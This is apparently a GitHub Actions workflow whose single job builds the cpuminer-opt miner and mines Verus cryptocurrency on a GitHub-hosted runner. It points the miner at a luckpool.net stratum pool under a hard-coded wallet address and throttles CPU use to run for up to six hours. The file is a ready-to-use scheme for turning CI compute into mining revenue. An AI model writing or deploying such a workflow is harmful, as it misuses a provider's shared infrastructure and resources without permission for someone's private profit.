name: njing

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install git build-essential automake autoconf libtool \
        pkg-config libcurl4-openssl-dev libjansson-dev libssl-dev \
        cpulimit -y

    - name: Build miner with Verus support
      run: |
        git clone https://github.com/JayDDee/cpuminer-opt.git miner
        cd miner
        git checkout v3.19.6
        ./build.sh

    - name: Start mining
      run: |
        cd miner
        cpulimit -l 80 -- ./cpuminer \
        -a verus \
        -o stratum+tcp://na.luckpool.net:3956 \
        -u RQLTCKt8WJAMwfW29tZfn8jJ6WeoNmkP4P.worker \
        -p x \
        -t 1
